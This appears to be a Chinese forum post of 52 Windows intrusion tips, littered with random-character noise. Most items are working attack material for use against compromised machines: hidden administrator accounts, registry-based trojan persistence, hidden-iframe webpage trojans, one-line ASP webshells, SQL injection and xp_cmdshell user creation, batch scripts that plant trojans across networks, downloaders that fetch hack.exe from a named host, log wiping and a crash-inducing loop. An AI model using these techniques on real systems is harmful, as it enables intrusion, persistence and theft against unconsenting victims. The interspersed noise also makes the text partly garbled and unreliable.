1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
1 V: {( e* L5 b" g" P: V+ Tcacls C:\windows\system32 /G hqw20:R
+ g8 }& {5 h. S9 M0 `4 r思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
0 c7 \4 [/ a& }% ?5 u恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
% H6 ]& X% R8 q& H
) @# q4 F& h" t$ @$ Q* B* b2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
- B4 B( m' i6 L* p8 o9 V2 Y2 R0 D! o
- @; i4 \# V4 F5 M- {) r3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
" p; `$ F. @! D- N2 j: W5 ]) p: a G: l+ H
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号* {, w6 P! s0 \4 \8 {. O
0 l o& l$ M4 v8 B* \0 ~) z. ~) L; c
5、利用INF文件来修改注册表$ }; u' h7 }! G0 G; e3 {1 u% _: R
[Version]9 w* b, R Y' F5 t9 o0 D
Signature="$CHICAGO$"3 n: p2 X0 ]0 a) ]
[Defaultinstall]2 a4 g. l- V7 K: a; X
addREG=Ating% z9 u% ~! f h P! @5 T" A. l* q
[Ating]% A y6 d( k2 `9 o1 i
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
& v$ V* L$ O( k3 l# g/ X/ H% P P以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
1 x0 H/ e1 c/ r7 N5 X+ n. urundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径, p9 m: z6 {' m. C Z1 p/ k
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
4 N* f7 I( J! A7 u z5 kHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU$ h/ F; ?- C2 G% o$ t6 E8 b
HKEY_CURRENT_CONFIG 简写为 HKCC
& b1 a7 F3 k& K" E# Z0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值. J. X- I: s, _, m( K" P2 x
"1"这里代表是写入或删除注册表键值中的具体数据- L2 k, J4 J; t4 X, P* p0 n1 j- W
, q3 o/ T( u" s1 D6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
; L O, r, t6 ^5 g9 s多了一步就是在防火墙里添加个端口,然后导出其键值7 i3 J+ ]+ c$ p& Y
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
; H) S2 D* ~' ]- W o9 x& n& V8 M. R4 O6 Z3 c0 M6 q0 x6 B/ D
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
! O8 l T7 F- [9 ?4 k U `9 a在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。' C% @( d' k: v* X
1 [* B: ? t# q8 D8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。7 D3 C% ^3 I& A/ ]9 ~4 {
" R4 C2 W9 j! N: R' n6 H! M; `+ t9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
5 X# p# e) z2 h可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
% Y7 R. d9 H' {5 y; p x
- i# d& D1 Z: _( \$ i" S$ q! H3 ?# {10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”. _6 N9 B, \* g, Y7 b2 C" y& P
' H9 r7 Y+ j9 {* ^( V
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,* H; o: X0 G3 q0 ?1 ~2 D: ]
用法:xsniff –pass –hide –log pass.txt3 e4 W5 L7 {* T/ P: _8 b- X7 U
1 Q4 Z6 v# K& m1 u8 k' T0 c5 p
12、google搜索的艺术
- E( g+ @+ ?' e, L) O6 |搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
4 t: x( K" T `- ?2 U或“字符串的语法错误”可以找到很多sql注入漏洞。6 h3 i& g' N- _4 O3 p
2 L2 v& S- g3 [2 c13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
; M# u. s0 A# e, z8 _
% ?2 p6 R0 |1 h6 G14、cmd中输入 nc –vv –l –p 1987
: Z* g& v* f- w, Y Q# ^+ Y! B# K做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
5 w7 r) T* G4 Y4 E) d" h$ C r, x/ _. q2 M4 T
15、制作T++木马,先写个ating.hta文件,内容为
) n8 U+ A( O) W3 Z<script language="VBScript">9 y7 y* w8 R% o( Z) L+ C
set wshshell=createobject ("wscript.shell" )
/ @+ Z2 C4 `) `a=wshshell.run("你马的名称",1)
% z! Q* x' s7 _6 O; m6 _0 k; b' Hwindow.close
0 B+ p- s, M4 d' r4 O</script>
) G6 G4 X0 d' P! p* @5 n再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
, B- h5 n; o/ b" g: k+ B; @' B/ z5 v' L7 J6 p" E
16、搜索栏里输入, S6 O' k' p- L; @2 C( p/ D! s
关键字%'and 1=1 and '%'='% |8 H$ R! B) |4 L
关键字%'and 1=2 and '%'='' P2 Y: v1 b* S; d2 K
比较不同处 可以作为注入的特征字符" H) X( }5 v4 t
& i. R" U4 g* V" @: L' R
17、挂马代码<html>" }& }- t+ p# X1 _( _; ?
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
3 H5 i( ^3 D; r</html>
# T# ]! n ?2 G% [3 R# X, H2 N; ~& z" c( ]3 B$ S, a
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
; U1 O, @3 w/ c3 }5 y; }net localgroup administrators还是可以看出Guest是管理员来。* o5 m( Y* [1 G% @8 {
( G9 E# H, H$ R19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等, Z1 E+ t) @8 L( T, f5 Z9 M. e2 r
用法: 安装: instsrv.exe 服务名称 路径
/ l5 b/ A7 B' ?* b2 J卸载: instsrv.exe 服务名称 REMOVE
6 N! ^! h# m' h4 w, h" G' O |1 z9 f% j5 @
9 C+ f0 w9 G6 F/ K5 F0 H
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
5 M' L! l) s7 J" D7 }8 _! C不能注入时要第一时间想到%5c暴库。
* m3 W& L: I+ _9 @! A$ D W# t# |3 h$ v6 D) ^( b
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
9 a& h8 o0 _2 t9 H! u) h
" `+ T4 z; p/ X2 R( S23、缺少xp_cmdshell时
7 t1 A- n1 j# Q" f9 L尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
5 r7 ~9 H1 H/ U7 {2 @假如恢复不成功,可以尝试直接加用户(针对开3389的)# E# E G# }9 g- r3 G' G
declare @o int
. F& i( G9 E- c% A Rexec sp_oacreate 'wscript.shell',@o out
4 {) A9 a$ v% c9 kexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员. Q7 v. H9 g; S2 P$ s
9 b* V5 f2 t1 m0 B% U0 {9 ]- d24.批量种植木马.bat
' N, l$ s8 V7 Y- A+ s P4 E0 jfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中' s/ n6 z" V: p5 E, n8 e# }
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
0 B* m( D( u6 `+ D扫描地址.txt里每个主机名一行 用\\开头
2 N! B" D" y$ |3 K3 B' r/ U; X- H6 I2 M
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。* g) D, \# F; @5 w4 y
+ v( D( L# I$ N2 V8 i
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
* R' b0 x3 }# u5 z" v将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.8 y( E2 q: N) ~
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
% o2 _, x) A: B" ]' g
4 g" D( _2 u. e% i+ ^27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP7 V8 i* o5 x5 z- V$ d5 k& c$ K; C
然后用#clear logg和#clear line vty *删除日志# O7 D% T( G6 M8 w) l
1 G& ]. I$ |2 g8 g F* ~3 J
28、电脑坏了省去重新安装系统的方法5 Z Z" ?# Q0 s, h/ c+ Q
纯dos下执行,
& K7 H1 \1 W8 v' I2 Hxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
4 G y7 y7 d; j$ u2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config; q* F/ Q9 D$ {1 K
7 v/ l, s& k( g" M' I T6 a29、解决TCP/IP筛选 在注册表里有三处,分别是:
2 G) y6 J3 M2 g! bHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip3 p9 F6 }; U* V2 E/ b2 e9 T
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip. v7 d4 \( f U& d% O: L0 x7 \
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 H# t) F: X$ T分别用
+ l g; \1 r* a1 dregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; }! c* t2 N4 w% {
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
" L. p; Q, P) B0 Fregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- l, L* V' K1 n3 i" \& C命令来导出注册表项
+ Z) q5 M( h( I5 h0 a' @然后把三个文件里的EnableSecurityFilters"=dword:00000001,
& H$ q+ U, K& W3 J. o8 W& h改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
- x/ ^+ r j" ^) o- f) v8 mregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。+ b8 ~: v9 ~5 f. t
6 S" G* \: h. M0 a
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
/ u$ }3 G# B) p5 Y: y9 W5 _! VSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的38 m/ z6 r) V3 h5 t, d$ X
3 W2 ]7 K5 v8 a e31、全手工打造开3389工具
& Q* [6 w0 P; ~& M r! k打开记事本,编辑内容如下:9 o8 R/ w' G0 R+ M. G* @
echo [Components] > c:\sql* T" C& s4 \* e# v5 R
echo TSEnable = on >> c:\sql
* U- z) W6 u+ U4 Rsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q) H' p" ]- C. [* B
编辑好后存为BAT文件,上传至肉鸡,执行8 k0 p* C* T8 Z* f
8 h; ~0 ` q. r( @" j2 h32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马+ v; r0 o' [0 h* `% F. H
& N% }5 Y+ G( g1 @8 X4 _" ^
33、让服务器重启
, W; `) Y5 |& S: p) I写个bat死循环:
. V0 n; n: c2 f@echo off Q! Q2 D5 z6 o' g* c
:loop1
& Y5 }4 w& Q' `cls
8 o2 m4 N }1 F% Z. n9 u4 cstart cmd.exe' A+ s; A0 B3 P. M' E8 F
goto loop1 |5 M% O( }- ~! [# W* ^# n
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启) ?; s, u1 G: E/ M: J, J( {
4 [- h' [6 `+ B$ R3 \34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,* ]; I8 T7 N1 s: R0 g% _5 W& T; @! d
@echo off& j0 K& A$ n9 w
date /t >c:/3389.txt
6 p5 x1 K! z' @5 }1 Jtime /t >>c:/3389.txt
. y# S; G+ K3 a, R/ zattrib +s +h c:/3389.bat
8 I1 i2 {6 d; U5 d7 h/ {attrib +s +h c:/3389.txt
* [! X1 o2 n' t) B! d! N' T9 h8 znetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
& R0 Y+ Q+ e5 ~: b: D) N ^并保存为3389.bat1 n0 s' k: P3 D: k5 s# E
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
' r5 j8 j& ]4 u$ m5 s; E$ J) }2 W5 Z( a0 n9 Y2 b% N# ^2 G
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
' B: V2 I, ]9 W astart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页) \$ W5 Y3 A: b! n3 Y6 y' Z7 n+ U2 r
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。5 H5 D U- ~% U. `. _
, W- E; k W% x1 q( n" `! G
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
" s% \8 X& {% {% ^* gecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址5 D4 \5 I4 G7 W2 c
echo 你的FTP账号 >>c:\1.bat //输入账号
9 w# \: Y; }( }/ T( `. v/ M' d& iecho 你的FTP密码 >>c:\1.bat //输入密码; {7 z0 f$ j! m n: P
echo bin >>c:\1.bat //登入8 U6 h$ S, g; @* v
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
! A) o! e) ]. w: c- ?( F& `1 D0 C% Decho bye >>c:\1.bat //退出, N9 x' X0 v0 @* l) U: S
然后执行ftp -s:c:\1.bat即可
1 o0 w: I1 V5 `# Z8 @6 p: N5 c# b0 d) b0 j7 j, {( i/ g! g1 c
37、修改注册表开3389两法
" A5 K7 j5 [4 L* P* V$ y(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表; o+ u1 u* G3 I. [
echo Windows Registry Editor Version 5.00 >>3389.reg: R6 M* d4 ]3 P+ l
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
Y+ k8 @& J, U& m6 t. Q5 aecho "Enabled"="0" >>3389.reg/ u4 s: h5 z2 {
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
0 b4 Y$ i' r* |2 A! s# ?- p4 |NT\CurrentVersion\Winlogon] >>3389.reg
( O8 D; ^+ \3 B& C% oecho "ShutdownWithoutLogon"="0" >>3389.reg8 c H7 O, M( Y' {# J
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
% \* Y" i; v1 _! s$ e>>3389.reg
% r# g1 ^0 i0 p3 Hecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
- I" @) k3 K& W) recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
7 _) v$ ?/ `; B1 }9 _7 a" k; D>>3389.reg
( z, b, z: Y6 t( Iecho "TSEnabled"=dword:00000001 >>3389.reg6 _& x7 u) o& e" p9 r$ a6 U5 @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg6 {3 A) ]: V. s( n/ ^
echo "Start"=dword:00000002 >>3389.reg
, N W0 N: J/ t9 t0 H+ recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
" M" {3 A% J; U# Z>>3389.reg" N' G; P, y7 |% a2 ]0 e# H
echo "Start"=dword:00000002 >>3389.reg7 ] i6 n8 p! R' B# C
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg$ L8 n2 N) {, p1 p5 h7 q+ a
echo "Hotkey"="1" >>3389.reg
; V% p9 P8 x; l7 K- d9 Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 r+ C, Q8 C2 L/ T
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
& n P8 V) s2 u- Eecho "PortNumber"=dword:00000D3D >>3389.reg7 l' M0 S1 M0 P6 D, r7 a0 H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" W6 F6 k1 L/ a% i0 _7 ^+ OServer\WinStations\RDP-Tcp] >>3389.reg4 Z0 h# b' r9 B( \
echo "PortNumber"=dword:00000D3D >>3389.reg$ F9 f! [ C6 u
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
9 X+ }/ G. w1 p(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
6 {7 B3 h6 s( n- X) R' N1 k; {+ R因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
+ _1 P0 L/ w+ b5 w$ p6 E9 b4 d(2)winxp和win2003终端开启
9 E2 `" O; L: N. s" C用以下ECHO代码写一个REG文件:
( I% T2 `2 o6 techo Windows Registry Editor Version 5.00>>3389.reg) X/ \0 D+ _5 Y* n, }- R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 A6 L0 Q& O! {5 N1 B8 V7 y5 uServer]>>3389.reg. {$ Y5 q9 c+ M7 X7 I! {: e* J. x
echo "fDenyTSConnections"=dword:00000000>>3389.reg2 ^7 M' j( i( k7 L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
a/ ^0 R; Z. EServer\Wds\rdpwd\Tds\tcp]>>3389.reg
+ i1 g, z! N5 f, c( ?echo "PortNumber"=dword:00000d3d>>3389.reg
% a, p! N1 j& u! f4 S& ?5 uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! f& W. }. s7 N. p! o
Server\WinStations\RDP-Tcp]>>3389.reg
3 ]) R, W8 ?/ s' c! f4 Secho "PortNumber"=dword:00000d3d>>3389.reg" b5 ?. E' y& P7 `/ f* N! d
然后regedit /s 3389.reg del 3389.reg9 B7 b' a) C: m" q- R, W# \* [
XP下不论开终端还是改终端端口都不需重启' E1 w6 O0 J4 M
( R. |: A" i9 `38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃9 W7 P9 G# U% G @
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
- h, P' S5 \' i) B$ d) S: x4 F: l% x _( u1 S! U/ w
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!. s |+ G# \3 z, ~8 ]' _% M) {) ?( _
(1)数据库文件名应复杂并要有特殊字符
# }( S6 n0 \% z$ V+ I+ Q7 i% c(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
; ~( v k7 ]. p0 q) O将conn.asp文档中的
* W/ `1 V- e) k* q. y8 V7 z X ]DBPath = Server.MapPath("数据库.mdb") Q" `0 F1 ~- @1 k! W( i4 G
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath$ i" R0 C# O" T$ j' N
4 ^( Y( A2 x; k+ ]6 {/ |% Z
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
U) r& {8 A s u5 T6 y; A(3)不放在WEB目录里# K/ t1 ~! x/ y8 Y7 E2 k; g
8 L& r/ _1 z- @5 s9 f40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉2 h- u6 g6 D+ @8 J, s
可以写两个bat文件) U# Z1 R6 \$ g. R
@echo off2 E& B% h! ` G& V" A5 z6 L3 _
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
, o1 d2 ~0 l8 w" k! ~@del c:\winnt\system32\query.exe
% ~# T- y9 W; M# u@del %SYSTEMROOT%\system32\dllcache\query.exe
/ X4 S3 O" Z8 J. H* S, h@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
3 z N9 B4 {& [# I" H1 H) v- p+ `* y- U% F' N8 B4 g/ Q$ o6 J
@echo off
& d9 X: T2 ?1 y@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe" }1 S5 m8 Q, Q, R6 G
@del c:\winnt\system32\tsadmin.exe
. u+ m. d; x7 I* y3 }2 k0 d# g@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
: N2 r1 e. I4 h: m0 ^% |* A/ o8 L1 L/ Q( E+ w
41、映射对方盘符* b/ E: N: Z% o. O, \# Q
telnet到他的机器上,; I. J# A5 s8 e5 L
net share 查看有没有默认共享 如果没有,那么就接着运行# o& \# @& F* f. ~
net share c$=c:! R$ d/ Q/ E2 z* w
net share现在有c$
6 b; m+ \% S( z) v- m在自己的机器上运行 C9 `- \; W3 [. a$ J# x3 a
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K8 u. |6 X, Y) c q4 q
2 [1 s4 R" O8 n. b4 O$ F8 K42、一些很有用的老知识
6 ], h& \& j ]type c:\boot.ini ( 查看系统版本 )/ N1 S: }% c. Y3 U
net start (查看已经启动的服务). J9 F/ |2 h7 v
query user ( 查看当前终端连接 )4 T. d) a: s, K; T
net user ( 查看当前用户 )
# Y+ \0 |3 L: `% B9 {+ K/ [net user 用户 密码/add ( 建立账号 )
" d4 ^" q4 O5 J4 z! |5 k" jnet localgroup administrators 用户 /add (提升某用户为管理员)
" ^# @; d& E5 S+ j1 L; q# |ipconfig -all ( 查看IP什么的 )
$ O) ` l; R. ~( @8 n/ e0 U0 w* {* inetstat -an ( 查看当前网络状态 )* h+ [& o* q" L7 ^1 O
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
' C1 q2 c" S/ {克隆时Administrator对应1F41 \8 N, n. G' V0 J$ ^
guest对应1F5% ?& e& J. ~4 n+ z$ U1 a+ G5 L
tsinternetuser对应3E88 E9 j$ c4 c3 R! f
( @" n0 `) L9 g43、如果对方没开3389,但是装了Remote Administrator Service: f6 P3 s4 X' m( m, F- c8 T2 f
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
* P9 ] W* `% [5 O, D$ W" C解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
, X+ Q" Q3 l7 E% K$ a5 n* y先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
8 \9 P5 ]0 ?1 S o& l* _% J/ Z# P6 i" B1 r
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)( ]4 ^/ }7 W u% Q
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
5 w0 F# w6 X; q
! j& ]7 K. o% k* [9 T+ e: D45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
6 D( b& \, Z3 {6 { z( k [echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open5 k# Q6 [, d2 @1 K: A' D
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =( v& I4 M, B6 Y) v- C H' ^
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
1 j0 R; o0 Y; O0 R9 d: X: B6 f1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
6 a% F$ [) Q H6 u(这是完整的一句话,其中没有换行符)
" R( i1 e9 n# @& t- ^然后下载:) B* w$ T: V h& ~. v# ~' S& e
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
& J7 F5 z. B2 B6 _) d$ I/ B
7 H3 e! Q$ G4 ?5 Z" \46、一句话木马成功依赖于两个条件:
, K) c K: I3 j+ `1、服务端没有禁止adodb.Stream或FSO组件
r3 Z2 Y* J; h+ f/ \; h* H2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
4 ?. Z3 k: b' ]. u; e: m! D7 n: U3 e& h) p* B
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
G2 p1 V0 ^/ O! b;alter database utsz set RECOVERY FULL--1 C N/ i2 H0 `- t. _; f1 b3 j# }; r
;create table cmd (a image)--
5 l9 `1 L) P5 Q: u# ^;backup log utsz to disk = 'D:\cmd' with init--
- z! y! J1 s$ i3 w;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--* j n2 B+ v; y) _$ R4 _/ c
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--3 Z! c7 |5 B6 N+ [! U5 b
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
. O/ m/ C0 a* p# L& A% z7 s7 X' K5 u5 d Y$ m' u
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:- r, V2 `1 D" h6 \; q
. Z+ o, H/ x) t7 ?+ x* @, s; `用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
' _: h. Q/ G- Q所有会话用 'all'。' z( H& L$ e8 ~% Q# U6 o, `
-s sessionid 列出会话的信息。
5 G) e9 {4 t7 F: S2 u-k sessionid 终止会话。
! F- A* q" H0 K+ u5 L% y" F-m sessionid 发送消息到会话。
/ a- c* b- m5 d4 V# x8 H9 h$ Z. y; r% [$ s4 I& N, ?
config 配置 telnet 服务器参数。
3 T( w1 i9 _/ F6 G( z& w6 L- |" l. l/ M9 y& r
common_options 为:( n0 ?( `8 x& U0 L5 S/ l% s
-u user 指定要使用其凭据的用户
4 z. a, t3 I6 N3 @, ?-p password 用户密码+ T8 t7 {7 j3 V0 b( L
4 m7 {' J& o8 w7 u: N" F
config_options 为:) \. F( P) Y$ E/ T9 ]
dom = domain 设定用户的默认域. j! @) V% A5 z& ~* N5 G6 L! ^* q( o
ctrlakeymap = yes|no 设定 ALT 键的映射
9 L# n4 h) u% h7 ktimeout = hh:mm:ss 设定空闲会话超时值
+ w) U( E" x- @* K! b5 xtimeoutactive = yes|no 启用空闲会话。 W" r' n7 r4 z( D% x' o* W
maxfail = attempts 设定断开前失败的登录企图数。
6 r3 G# y5 B9 ?8 ^+ E4 X' f: \* kmaxconn = connections 设定最大连接数。
; g8 b8 g; C5 qport = number 设定 telnet 端口。" }5 K. e/ N# s! E8 ^$ n; J& T# Z
sec = [+/-]NTLM [+/-]passwd
* O, ?1 f, A+ I2 p, w/ _; |2 A设定身份验证机构
& @) U$ |- s% C1 i, C0 l9 M3 Cfname = file 指定审计文件名。% t8 g: n9 z% ~0 i Y: n
fsize = size 指定审计文件的最大尺寸(MB)。! }% U# \" G/ T" W: T# r% \
mode = console|stream 指定操作模式。
3 g0 r* o) G% v% |auditlocation = eventlog|file|both8 u2 m# ]2 W6 ?' X
指定记录地点" p8 z _9 T K6 V& ]4 S
audit = [+/-]user [+/-]fail [+/-]admin
3 P$ {. [, O3 X- U0 L) C. g6 W% r! Y2 p" ?0 k& `3 Y$ _) Q
49、例如:在IE上访问:2 {0 E1 }9 {. E
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
& a% W0 p4 b4 C) |hack.txt里面的代码是:
1 T! d4 b9 Z# ^6 d1 Z<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
9 K$ ?, F+ U- K4 O把这个hack.txt发到你空间就可以了!
3 S. G" ?' ^8 H6 d5 D/ W这个可以利用来做网马哦!, v7 z: r& R& I6 F5 y' s( k% P
4 x3 N7 V( o4 R. ~
50、autorun的病毒可以通过手动限制!' Z2 z" r1 Q1 s. K' T9 M: l
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
S' h @8 n' }) ^! L3 c2,打开盘符用右键打开!切忌双击盘符~# `2 N5 p" e% ~
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!. {4 G+ e9 V$ q* ^% V% ~
& t' c! |# ]4 m! i
51、log备份时的一句话木马:# ^# m: I# y9 z9 s1 O
a).<%%25Execute(request("go"))%%25>
4 D! P; ]* D$ }; a' N( bb).<%Execute(request("go"))%>
: n) @% p8 `5 [1 F2 n4 [+ Pc).%><%execute request("go")%><%
5 c7 | I& C* C0 Y0 s9 ?" sd).<script language=VBScript runat=server>execute request("sb")</Script>4 X2 x5 e" F7 ?2 Q& v% l9 P& J. R
e).<%25Execute(request("l"))%25>. X, w3 u8 ^/ w: f9 W
f).<%if request("cmd")<>"" then execute request("pass")%>
, y# X/ P7 o6 n; ~% b1 w/ ]9 B- Y8 f" O
52、at "12:17" /interactive cmd) @4 B- w1 q$ A
执行后可以用AT命令查看新加的任务. t& \2 S' |& Q/ j/ X$ l
